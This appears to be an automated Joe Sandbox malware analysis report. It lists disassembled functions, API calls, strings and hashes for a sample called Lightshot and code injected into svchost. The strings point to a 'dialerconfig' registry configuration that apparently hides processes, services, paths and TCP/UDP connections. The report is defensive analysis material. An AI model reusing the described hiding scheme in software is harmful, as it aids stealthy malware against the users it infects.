                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen
                                                                                • String ID: 0$@
                                                                                • API String ID: 4088430540-1545510068
                                                                                • Opcode ID: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                                • Instruction ID: e3c3a1f23b8c482a2cc228e0911a0252aec5947fd6e514883d78f39c1d2f002f
                                                                                • Opcode Fuzzy Hash: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                                • Instruction Fuzzy Hash: 42116D225286C182E350DB25F4867AEB374EFD8394F505225F68D83B69EF7ED14ACB01
                                                                                Function 00007FF6E4D81880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 349 7ff6e4d81880-7ff6e4d8189c 350 7ff6e4d818a2-7ff6e4d818f9 call 7ff6e4d82420 call 7ff6e4d82660 349->350 351 7ff6e4d81a0f-7ff6e4d81a1f 349->351 350->351 356 7ff6e4d818ff-7ff6e4d81910 350->356 357 7ff6e4d81912-7ff6e4d8191c 356->357 358 7ff6e4d8193e-7ff6e4d81941 356->358 359 7ff6e4d8194d-7ff6e4d81954 357->359 360 7ff6e4d8191e-7ff6e4d81929 357->360 358->359 361 7ff6e4d81943-7ff6e4d81947 358->361 364 7ff6e4d81956-7ff6e4d81961 359->364 365 7ff6e4d8199e-7ff6e4d819a6 359->365 360->359 362 7ff6e4d8192b-7ff6e4d8193a 360->362 361->359 363 7ff6e4d81a20-7ff6e4d81a26 361->363 362->358 368 7ff6e4d81a2c-7ff6e4d81a37 363->368 369 7ff6e4d81b87-7ff6e4d81b98 call 7ff6e4d81d40 363->369 366 7ff6e4d81970-7ff6e4d8199c call 7ff6e4d81ba0 364->366 365->351 367 7ff6e4d819a8-7ff6e4d819c1 365->367 366->365 372 7ff6e4d819df-7ff6e4d819e7 367->372 368->365 373 7ff6e4d81a3d-7ff6e4d81a5f 368->373 376 7ff6e4d819e9-7ff6e4d81a0d VirtualProtect 372->376 377 7ff6e4d819d0-7ff6e4d819dd 372->377 378 7ff6e4d81a7d-7ff6e4d81a97 373->378 376->377 377->351 377->372 379 7ff6e4d81a9d-7ff6e4d81afa 378->379 380 7ff6e4d81b74-7ff6e4d81b82 call 7ff6e4d81d40 378->380 385 7ff6e4d81afc-7ff6e4d81b0e 379->385 386 7ff6e4d81b22-7ff6e4d81b26 379->386 380->369 387 7ff6e4d81b5c-7ff6e4d81b6f call 7ff6e4d81d40 385->387 388 7ff6e4d81b10-7ff6e4d81b20 385->388 389 7ff6e4d81b2c-7ff6e4d81b30 386->389 390 7ff6e4d81a70-7ff6e4d81a77 386->390 387->380 388->386 388->387 389->390 391 7ff6e4d81b36-7ff6e4d81b53 call 7ff6e4d81ba0 389->391 390->365 390->378 395 7ff6e4d81b57 391->395 395->395
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E4D81247), ref: 00007FF6E4D819F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                                • Instruction ID: 824cb384d5ecf11bb6418f9fb1497abcaa6a0e8aa6d5bdaa4768260aa0325ef9
                                                                                • Opcode Fuzzy Hash: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                                • Instruction Fuzzy Hash: D551603BF08587C6EB109B35D8857782761AB19B94F446331E91C877A9CF3EE486C70A
                                                                                Function 00007FF6E4D81800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 396 7ff6e4d81800-7ff6e4d81810 397 7ff6e4d81824 396->397 398 7ff6e4d81812-7ff6e4d81822 396->398 399 7ff6e4d8182b-7ff6e4d81867 call 7ff6e4d82290 fprintf 397->399 398->399
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                                • Instruction ID: 8f3d81d6acc1e612f5706618cc18e964fff7cfcedf1e1de8d25c72951e46a20d
                                                                                • Opcode Fuzzy Hash: 1c04987d95cc1312a9d89c4e69c05c1118544e67408b6cf4f97d1d5589193830
                                                                                • Instruction Fuzzy Hash: 38F0F617E18A8682E2109B34A9812BDA3B0EF4D3C0F40A331EE8ED7255DF2DF182C305
                                                                                Function 00007FF6E4D8219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                                • Instruction ID: 3c5dc22c1df52a2665a7fbbdb78cd200c2d6258ca75aa6da50c4746e34337033
                                                                                • Opcode Fuzzy Hash: 5eff3f75befce3e92e47b05016d9c5d0d24caf54b52fc201209ce42e40f93eef
                                                                                • Instruction Fuzzy Hash: D9012C2BA0D64386F6159B65ED9437823A0BF1CFD0F542231CE0DC36A4DF2EA895C30A

                                                                                Execution Graph

                                                                                Execution Coverage:0.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:81
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 14911 195dd5c1abc 14917 195dd5c1628 GetProcessHeap 14911->14917 14913 195dd5c1ad2 Sleep SleepEx 14915 195dd5c1acb 14913->14915 14915->14913 14916 195dd5c1598 StrCmpIW StrCmpW 14915->14916 14962 195dd5c18b4 14915->14962 14916->14915 14918 195dd5c1648 _invalid_parameter_noinfo 14917->14918 14979 195dd5c1268 GetProcessHeap 14918->14979 14920 195dd5c1650 14921 195dd5c1268 2 API calls 14920->14921 14922 195dd5c1661 14921->14922 14923 195dd5c1268 2 API calls 14922->14923 14924 195dd5c166a 14923->14924 14925 195dd5c1268 2 API calls 14924->14925 14926 195dd5c1673 14925->14926 14927 195dd5c168e RegOpenKeyExW 14926->14927 14928 195dd5c16c0 RegOpenKeyExW 14927->14928 14929 195dd5c18a6 14927->14929 14930 195dd5c16ff RegOpenKeyExW 14928->14930 14931 195dd5c16e9 14928->14931 14929->14915 14933 195dd5c1723 14930->14933 14934 195dd5c173a RegOpenKeyExW 14930->14934 14983 195dd5c12bc RegQueryInfoKeyW 14931->14983 14994 195dd5c104c RegQueryInfoKeyW 14933->14994 14937 195dd5c175e 14934->14937 14938 195dd5c1775 RegOpenKeyExW 14934->14938 14935 195dd5c16f5 RegCloseKey 14935->14930 14942 195dd5c12bc 11 API calls 14937->14942 14939 195dd5c17b0 RegOpenKeyExW 14938->14939 14940 195dd5c1799 14938->14940 14944 195dd5c17d4 14939->14944 14945 195dd5c17eb RegOpenKeyExW 14939->14945 14943 195dd5c12bc 11 API calls 14940->14943 14946 195dd5c176b RegCloseKey 14942->14946 14947 195dd5c17a6 RegCloseKey 14943->14947 14948 195dd5c12bc 11 API calls 14944->14948 14949 195dd5c180f 14945->14949 14950 195dd5c1826 RegOpenKeyExW 14945->14950 14946->14938 14947->14939 14951 195dd5c17e1 RegCloseKey 14948->14951 14952 195dd5c104c 4 API calls 14949->14952 14953 195dd5c1861 RegOpenKeyExW 14950->14953 14954 195dd5c184a 14950->14954 14951->14945 14957 195dd5c181c RegCloseKey 14952->14957 14955 195dd5c189c RegCloseKey 14953->14955 14956 195dd5c1885 14953->14956 14958 195dd5c104c 4 API calls 14954->14958 14955->14929 14959 195dd5c104c 4 API calls 14956->14959 14957->14950 14960 195dd5c1857 RegCloseKey 14958->14960 14961 195dd5c1892 RegCloseKey 14959->14961 14960->14953 14961->14955 15006 195dd5c14a4 14962->15006 15000 195dd5d6168 14979->15000 14981 195dd5c1283 GetProcessHeap 14982 195dd5c12ae _invalid_parameter_noinfo 14981->14982 14982->14920 14984 195dd5c148a __free_lconv_mon 14983->14984 14985 195dd5c1327 GetProcessHeap 14983->14985 14984->14935 14991 195dd5c133e _invalid_parameter_noinfo __free_lconv_mon 14985->14991 14986 195dd5c1352 RegEnumValueW 14986->14991 14987 195dd5c1476 GetProcessHeap 14987->14984 14989 195dd5c13d3 GetProcessHeap 14989->14991 14990 195dd5c141e lstrlenW GetProcessHeap 14990->14991 14991->14986 14991->14987 14991->14989 14991->14990 14992 195dd5c13f3 GetProcessHeap 14991->14992 14993 195dd5c1443 StrCpyW 14991->14993 15001 195dd5c152c 14991->15001 14992->14991 14993->14991 14995 195dd5c11b5 RegCloseKey 14994->14995 14997 195dd5c10bf _invalid_parameter_noinfo __free_lconv_mon 14994->14997 14995->14934 14996 195dd5c10cf RegEnumValueW 14996->14997 14997->14995 14997->14996 14998 195dd5c114e GetProcessHeap 14997->14998 14999 195dd5c116e GetProcessHeap 14997->14999 14998->14997 14999->14997 15002 195dd5c157c 15001->15002 15003 195dd5c1546 15001->15003 15002->14991 15003->15002 15004 195dd5c155d StrCmpIW 15003->15004 15005 195dd5c1565 StrCmpW 15003->15005 15004->15003 15005->15003 15007 195dd5c14e1 GetProcessHeap 15006->15007 15008 195dd5c14c1 GetProcessHeap 15006->15008 15012 195dd5d6180 15007->15012 15010 195dd5c14da __free_lconv_mon 15008->15010 15010->15007 15010->15008 15013 195dd5d6182 15012->15013 15014 195dd59273c 15016 195dd59276a 15014->15016 15015 195dd592858 LoadLibraryA 15015->15016 15016->15015 15017 195dd5928d4 15016->15017

                                                                                Executed Functions

                                                                                Function 00000195DD5C328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: b559a2181ff40e2a117a780b745b7d932bb3298ad3057c49ecb9ab2035d3dd06
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: 9C11C030A12F0C82FB72ABE9F9387D923D7A784B85F504124DA06E1EA5EFB9C044C350
                                                                                Function 00000195DD5C1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000195DD5C1628: GetProcessHeap.KERNEL32 ref: 00000195DD5C1633
                                                                                  • Part of subcall function 00000195DD5C1628: HeapAlloc.KERNEL32 ref: 00000195DD5C1642
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16B2
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16DF
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C16F9
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1719
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1734
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1754
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C176F
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C178F
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17AA
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17CA
                                                                                • Sleep.KERNEL32 ref: 00000195DD5C1AD7
                                                                                • SleepEx.KERNELBASE ref: 00000195DD5C1ADD
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17E5
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1805
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1820
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1840
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C185B
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C187B
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1896
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C18A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: f3b7e964aa4799e71de0d0524ef43308711ea80b0fc304bbb8b55dd9ae371198
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: C7315171202E0951FF52ABAADA70BE963E7AB54BD4F0454218E0EE7FD5FE20C861C750
                                                                                Function 00000195DD5C3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 57 195dd5c3844-195dd5c384f 58 195dd5c3851-195dd5c3864 StrCmpNIW 57->58 59 195dd5c3869-195dd5c3870 57->59 58->59 60 195dd5c3866 58->60 60->59
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction ID: 8525adf6a2d64dd7061414e58bca951bdbbd2a01b88122cd2fc985ec43bc3963
                                                                                • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction Fuzzy Hash: 89D0A770353B0DC7FF26DFEA88E46E423E2EB08744F884030C90052A50DB18898D9B20
                                                                                Function 00000195DD59273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 3c42989a6f1da65d8c668265381177c755b331e9ddf0642a5a91f75fe2288bf4
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: DF612632B01A90C7DB56CF65D020BBD73D7F754BA4F988125DE5927B88DA38D892CB00

                                                                                Non-executed Functions

                                                                                Function 00000195DD5C2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 369 195dd5c2b2c-195dd5c2ba5 call 195dd5e2ce0 372 195dd5c2ee0-195dd5c2f03 369->372 373 195dd5c2bab-195dd5c2bb1 369->373 373->372 374 195dd5c2bb7-195dd5c2bba 373->374 374->372 375 195dd5c2bc0-195dd5c2bc3 374->375 375->372 376 195dd5c2bc9-195dd5c2bd9 GetModuleHandleA 375->376 377 195dd5c2bed 376->377 378 195dd5c2bdb-195dd5c2beb call 195dd5d6090 376->378 380 195dd5c2bf0-195dd5c2c0e 377->380 378->380 380->372 383 195dd5c2c14-195dd5c2c33 StrCmpNIW 380->383 383->372 384 195dd5c2c39-195dd5c2c3d 383->384 384->372 385 195dd5c2c43-195dd5c2c4d 384->385 385->372 386 195dd5c2c53-195dd5c2c5a 385->386 386->372 387 195dd5c2c60-195dd5c2c73 386->387 388 195dd5c2c83 387->388 389 195dd5c2c75-195dd5c2c81 387->389 390 195dd5c2c86-195dd5c2c8a 388->390 389->390 391 195dd5c2c9a 390->391 392 195dd5c2c8c-195dd5c2c98 390->392 393 195dd5c2c9d-195dd5c2ca7 391->393 392->393 394 195dd5c2d9d-195dd5c2da1 393->394 395 195dd5c2cad-195dd5c2cb0 393->395 396 195dd5c2ed2-195dd5c2eda 394->396 397 195dd5c2da7-195dd5c2daa 394->397 398 195dd5c2cc2-195dd5c2ccc 395->398 399 195dd5c2cb2-195dd5c2cbf call 195dd5c199c 395->399 396->372 396->387 402 195dd5c2dbb-195dd5c2dc5 397->402 403 195dd5c2dac-195dd5c2db8 call 195dd5c199c 397->403 400 195dd5c2cce-195dd5c2cdb 398->400 401 195dd5c2d00-195dd5c2d0a 398->401 399->398 400->401 405 195dd5c2cdd-195dd5c2cea 400->405 406 195dd5c2d3a-195dd5c2d3d 401->406 407 195dd5c2d0c-195dd5c2d19 401->407 409 195dd5c2df5-195dd5c2df8 402->409 410 195dd5c2dc7-195dd5c2dd4 402->410 403->402 414 195dd5c2ced-195dd5c2cf3 405->414 416 195dd5c2d3f-195dd5c2d49 call 195dd5c1bbc 406->416 417 195dd5c2d4b-195dd5c2d58 lstrlenW 406->417 407->406 415 195dd5c2d1b-195dd5c2d28 407->415 412 195dd5c2dfa-195dd5c2e03 call 195dd5c1bbc 409->412 413 195dd5c2e05-195dd5c2e12 lstrlenW 409->413 410->409 419 195dd5c2dd6-195dd5c2de3 410->419 412->413 439 195dd5c2e4a-195dd5c2e55 412->439 423 195dd5c2e14-195dd5c2e1e 413->423 424 195dd5c2e35-195dd5c2e3f call 195dd5c3844 413->424 421 195dd5c2d93-195dd5c2d98 414->421 422 195dd5c2cf9-195dd5c2cfe 414->422 425 195dd5c2d2b-195dd5c2d31 415->425 416->417 416->421 427 195dd5c2d5a-195dd5c2d64 417->427 428 195dd5c2d7b-195dd5c2d8d call 195dd5c3844 417->428 429 195dd5c2de6-195dd5c2dec 419->429 432 195dd5c2e42-195dd5c2e44 421->432 422->401 422->414 423->424 433 195dd5c2e20-195dd5c2e33 call 195dd5c152c 423->433 424->432 425->421 434 195dd5c2d33-195dd5c2d38 425->434 427->428 437 195dd5c2d66-195dd5c2d79 call 195dd5c152c 427->437 428->421 428->432 438 195dd5c2dee-195dd5c2df3 429->438 429->439 432->396 432->439 433->424 433->439 434->406 434->425 437->421 437->428 438->409 438->429 444 195dd5c2ecc-195dd5c2ed0 439->444 445 195dd5c2e57-195dd5c2e5b 439->445 444->396 448 195dd5c2e63-195dd5c2e7d call 195dd5c85c0 445->448 449 195dd5c2e5d-195dd5c2e61 445->449 450 195dd5c2e80-195dd5c2e83 448->450 449->448 449->450 453 195dd5c2e85-195dd5c2ea3 call 195dd5c85c0 450->453 454 195dd5c2ea6-195dd5c2ea9 450->454 453->454 454->444 456 195dd5c2eab-195dd5c2ec9 call 195dd5c85c0 454->456 456->444
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                                • Instruction ID: dde7fd9efa89a5466707bb46948bcd2f38f9c7ac15f82b741b3087f18559b81d
                                                                                • Opcode Fuzzy Hash: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                                • Instruction Fuzzy Hash: 40B1AF76212E5882EB669FA9D460BE973E6FB54B84F485016EE09B3F94EF34CC41C740
                                                                                Function 00000195DD5C7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: fc690ca620e4485241193952ba8c83509054a4c62fcfc94005514e0c22233189
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: B0314F72205F848AEB619FA4E8607ED73E5F784744F44442ADA4EA7F98EF38C549C710
                                                                                Function 00000195DD5CD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 88954bb95814ee6b498564cf1bdcac9ec7b9223e226e11f4f982859e9a819e51
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 77313A32215F8486EB618B69E8503DE73E5F789794F500126EA9D93F98EF38C546CB00
                                                                                Function 00000195DD5C1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 3fed60f760ab3f32da691e52dbf4ab303354c7f47779857e17f14048716fb99a
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: A1711C36311F1886EB119FA6E860AD923F6FB85B89F005111DE4EA7F69EF34C485C750
                                                                                Function 00000195DD5C12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
